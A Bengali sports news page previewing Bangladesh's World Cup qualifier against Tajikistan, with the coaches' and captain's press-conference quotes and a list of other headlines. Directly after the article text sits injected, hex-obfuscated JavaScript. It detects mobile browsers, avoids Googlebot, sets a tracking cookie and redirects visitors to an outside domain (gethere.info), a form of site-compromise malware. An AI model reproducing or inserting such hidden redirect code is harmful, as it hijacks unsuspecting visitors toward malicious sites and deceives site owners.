for Add

ঘুরে দাঁড়াতে পারবেন মামুনুলরা?

1
নিজস্ব প্রতিবেদক : কিরগিজস্তানের বিপক্ষে হারের পর সবার মুখে ঘুরে দাঁড়ানোর প্রত্যয়। সে ঘুরে দাঁড়ানো ম্যাচের প্রতিপক্ষ আরও শক্তিশালী তাজিকিস্তান। বাংলাদেশ কী পারবে হতাশার বৃত্ত ভেঙ্গে আশার আলো ছড়াতে? কাজটি কঠিন। তাই বলেতো আর মাঠে নামার আগেই হেরে বসা যায় না। মামুনুলরাও চাননা আগে হেরে যেতে। শেষ বিন্দু ঘাম দিয়ে তাজিকিস্তানের বিপক্ষে লড়তে প্রতিজ্ঞাবদ্ধ তারা। সে লড়াইয়ের ফল জয় না হোক-ড্রটাও হবে অনেক পাওয়ার। তাজিকিস্তানের বিপক্ষে হারলে যে বিশ্বকাপ ও এশিয়ান কাপ ফুটবলের বাছাই পর্ব থেকেই বিদায়ঘন্টা বেঁজে যাবে লাল-সবুজ জার্সিধারীদের।
বাছাই পর্বে ৮ ম্যাচ। চার প্রতিপক্ষের মধ্যে কাছাকাছি শক্তির দুই দল কিরগিজস্তান ও তাজিকিস্তান। তাদের বিপক্ষেই হোম ম্যাচ দিয়ে বিশ্বকাপ মিশন শুরু। ভালো কিছুর আশাটা জেগেছিল সে কারনেই। শুরুটা ভালো হয়নি। যাদের বিপক্ষে জয় পাওয়াটা ছিল জরুরী সেই কিরগিজস্তানের কাছে হেরেই শুরু মামুনুলদের। এবার পরীক্ষার নাম তাজিকিস্তান।
আগামীকাল (মঙ্গলবার) বিকেল ৫ টায় বঙ্গবন্ধু জাতীয় স্টেডিয়ামে মুখোমুখি হবে বাংলাদেশ ও তাজিকিস্তান। দুই দলের শুরুটাই হয়েছে হার দিয়ে। বাংলাদেশ ১-৩ গোলে হেরেছে কিরগিজস্তানের বিপক্ষে। তাজিকিস্তান একই ব্যবধানে হেরেছে জর্ডানের কাছে। দুই দলের জন্যই এ ম্যাচটি গুরুত্বপুর্ন। জয়ের জন্য মরিয়া হয়েই মাঠে নামবে দক্ষিণ এশিয়া ও মধ্য এশিয়ার দুই দেশ। কাগজ-কলমের শক্তিতে এগিয়ে তাজিকিস্তান। ফিফা র‌্যাঙ্কিংয়ে তাদের অবস্থান ১৩৯, বাংলাদেশের ১৬৬। ২৭ ধাপ এগিয়ে থাকা একটি দলকে সমীহ করেই মাঠে নামতে হবে বাংলাদেশকে। স্বাগতিকরা এগিয়ে থাকছে এক জায়গায়-সর্বশেষ সাক্ষাতে যে আছে জয়ের মধুর স্মৃতি। ২০১০ সালে কলম্বোয় অনুষ্ঠিত এএফসি চ্যালেঞ্জ কাপে বাংলাদেশ ২-১ গোলে হারিয়েছিল তাজিকদের। দলটির বিপেক্ষ জয়ের অভ্যাস যে আছে বাংলাদেশের। বাংলাদেশ ও তাজিকিস্তান ফিফা স্বীকৃত ৬ ম্যাচে পরস্পরের মোকাবিলা করেছে। তাজিকিস্তান জিতেছে ৪ ম্যাচ, বাংলাদেশ ১টি। ড্র হয়েছে একটি ম্যাচ।
ম্যাচটিকে কঠিন চ্যালেঞ্জ হিসেবেই নিয়েছেন বাংলাদেশের ডাচ্ কোচ লোডভিক ডি ক্রুইফ। ক্রুইফের জন্য ম্যাচটি যে এসিড টেস্ট। এ ম্যাচ না জিতলে ‘পার্টটাইম’ ক্রুইফের ‘ফুলটাইম’ বিদায় হয়ে যেতে পারে। বাংলাদেশ ফুটবল ফেডারেশনের সভাপতি ইতিমধ্যে সে সঙ্কেত দিয়ে রেখেছেন এ ডাচ কোচকে। আজ (সোমবার) বাফুফে ভবনে অনুষ্ঠিত সংবাদ সম্মেলনে ক্রুইফ তাজিকিস্তানের বিপক্ষে ম্যাচ নিয়ে বলেছেন, ‘তাজিকিস্তান সম্পর্কে যে ধারণা পেয়েছি তাতে বোঝা গেছে তাদের বিপক্ষে জয় পাওয়া সহজ হবে না। তারা কঠিন দল। জর্ডানের বিপক্ষে তাদের ম্যাচ-ভিডিও দেখেছি। তাজিকিদরে প্রতিটি বিভাগই ভাল। শারীরিকভাবেও তারা আমাদের চেয়ে অনেক এগিয়ে। আমাদের একটি বড় চ্যালেঞ্জ এই ম্যাচটি। যেহেতু খেলাটা ফুটবল। তাই সবই সম্ভব। আমরা জয়ের চেষ্টা করব। নিজেদের সামর্থ্য অনুযায়ী চেষ্টা করলে ম্যাচ জেতাও সম্ভব।’
বাংলাদেশ অধিনায়ক মামুনুল ইসলাম বলেছেন, ‘মঙ্গলবারে ম্যাচে আমরা শতভাগ দেব। গত ম্যাচের ভুলগুলো যেন এই ম্যাচে না হয় সেদিকে সবাই খেয়াল রাখব। এ ম্যাচে জয়ের জন্য আমরা মানসিকভাবে উজ্জীবিত আছি। তাজিকিস্তানের ম্যাচ ভিডিও দেখে তাদের সম্পর্কে ধারণা দিয়েছেন কোচ। তাদের কোন কোন খেলোয়াড় ভালো, তাদের ভিডিও দেখে মুভমেন্টগুলো লক্ষ্য করে কৌশল নির্ধারণ করেছেন। কোন কোন পজিশনে ফাউল করা যাবে না তার শিক্ষাও দিয়েছেন। ভুল করলে দায়-দায়িত্বটা খেলোয়াড়দেরই। দলীয় পারফরম্যান্স ছাড়া ভাল ফল সম্ভব নয়। তা দলের সবাইকে যার যার পজিশনে ভালো খেলে দেশের জন্য কিছু করতে হবে।’
জর্ডানের কাছে ৩-১ গোলে হারলেও বাংলাদেশের মাটিতেও জয় পেতে আত্মবিশ্বাসী তাজিকিস্তানের কোচ মুখসিন মুখামাদিয়েভ, ‘বাংলাদেশ তাদের নিজেদের মাটিতে আগের ম্যাচটি হেরেছে। তবে তারা সহজ দল নয়। তাদের হারানো কঠিন হবে। তারপরও আমাদের লক্ষ্য জয়। ইনশাল্লাহ আমরাই জিতব।’ খারাপ আবহাওয়া প্রসঙ্গে তাজিক কোচ বলেছেন, ‘আবহাওয়া গরম হোক কিংবা বৃষ্টি হোক সেটি ব্যাপার না। সমস্যা হলে দুই দলেরই হবে।’var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

সব সংবাদ

৪০০তম গ্র্যান্ড স্ল্যাম ম্যাচ জিতে রেকর্ড জোকোভিচের নড়াইলে তারুণ্যের উৎসব চুকবল কর্মসূচি চট্টগ্রামকে হারিয়ে চ্যাম্পিয়ন রাজশাহী হকির সাবেক অধিনায়কের এ কি কান্ড! বিব্রতকর হার নিয়ে রেসলিং ক্যারিয়ারের ইতি টানলেন জন সিনা বিজয় দিবসে বিসিবির প্রীতি ম্যাচে খেলবেন যারা বিএনপির মনোনয়ন পেলেন সাবেক দুই তারকা ফুটবলার ৩০ নভেম্বর কক্সবাজারে বিওএ’র নির্বাচন বর্ণাঢ্য আয়োজনে বিএসপিএর নতুন কার্যালয় উদ্বোধন এশিয়ান আর্চারিতে ভালো করার প্রত্যয় মেসির গোলেও শেষ রক্ষা হলো মিয়ামির ইসলামিক সলিডারিটি গেমসে টিটির লক্ষ্য সেমিফাইনাল ২১তম জাতীয় দূরপাল্লা সাঁতার প্রতিযোগিতা বাংলাদেশের টেস্ট অধিনায়ক থাকছেন শান্ত ইসলামিক সলিডারিটি গেমসে কাঙ্ক্ষিত ফলাফলের প্রত্যাশা বাংলাদেশের নোশিনের শিরোপা অক্ষুন্ন হাসপাতালে ভর্তি মাহমুদউল্লাহ যোগ দিয়েছেন জামাল-জায়ানসহ ১৪ জন, ভারত ম্যাচের ক্যাম্প শুরু নারী হকিতে কোটি টাকার টুর্নামেন্ট থাইল্যান্ডের কাছে হেরে গেল বাংলাদেশের মেয়েরা কাভাকাপ ভলিবলে বাংলাদেশের টানা তৃতীয় জয় আর্টিসান জাতীয় সেপাক টাকরো শুরু কাভাকাপ ভলিবলে বাংলাদেশের দ্বিতীয় জয় সেরা সাঁতারু সামিউল রাফি চট্টগ্রামে কাল জিয়া ফুটবল টুর্নামেন্ট শীর্ষ দাবাড়ুরা খেলবেন ব্লাইন্ডফোল্ড চেস টুর্নামেন্ট আন্তর্জাতিক ভলিবলে মালদ্বীপকে হারিয়ে শুরু বাংলাদেশের জাতীয় সাঁতারে সামিউল রাফির আরেকটি রেকর্ড নরসিংদীতে সব শিক্ষাপ্রতিষ্ঠানের মাঠ খেলার উপযোগী করার নির্দেশ এশিয়ান যুব গেমস কাবাডিতে বাংলাদেশের পদক জয় কাভা আন্তর্জাতিক ভলিবল কাল থেকে শুরু রাফির ৪টি রেকর্ডসহ মোট ৭টি জাতীয় রেকর্ড ২৪ অক্টোবর শুরু হচ্ছে জাতীয় সেপাক টাকরো  জাতীয় সাঁতারে প্রথম দিনে ৫টি নতুন জাতীয় রেকর্ড কিউট-বিএসপিএ স্পোর্টস কার্নিভালে সেরা ক্রীড়াবিদ মুকুল জয় দিয়ে ওয়েস্ট ইন্ডিজ সিরিজ শুরু করতে চায় বাংলাদেশ নভেম্বরে ঢাকায় নারী বিশ্বকাপ কাবাডি আগামী এক বছরে ২৪টি ওয়ানডে খেলবে বাংলাদেশ ব্রাজিলের হয়ে বিশ্বকাপে ইতিহাস গড়তে প্রস্তুত আনচেলত্তি নারী হকিতে ভরসার নাম অর্পিতা পাল বাংলাদেশের মেয়েদের দুবাইয়ে দ্বিতীয় ম্যাচেও সহজ জয় ওয়ার্ল্ড টেনিস ট্যুর জুনিয়র টেনিসে বাংলাদেশের জারিফ চ্যাম্পিয়ন শেষ মুহূর্তের গোলে বাংলাদেশের স্বপ্নভঙ্গ হার দিয়ে ওয়ানডে সিরিজ শুরু বাংলাদেশের হংকংয়ের বিপক্ষে পূর্ণ তিন পয়েন্টের লক্ষ্য ক্যাবরেরার ওয়ার্ল্ড টেনিস ট্যুর জুনিয়র শনিবার থেকে শুরু ৪ বছর পর শুরু হচ্ছে ফেডারেশন কাপ ‘ইনশাআল্লাহ আমরা জিতমু’ : হামজা চৌধুরী লড়াই করে হারল বাংলাদেশ আবারও বিসিবি সভাপতি বুলবুল

For add

For add

গুরুত্বপূর্ণ কিছু লিংক

For add

For add

for Add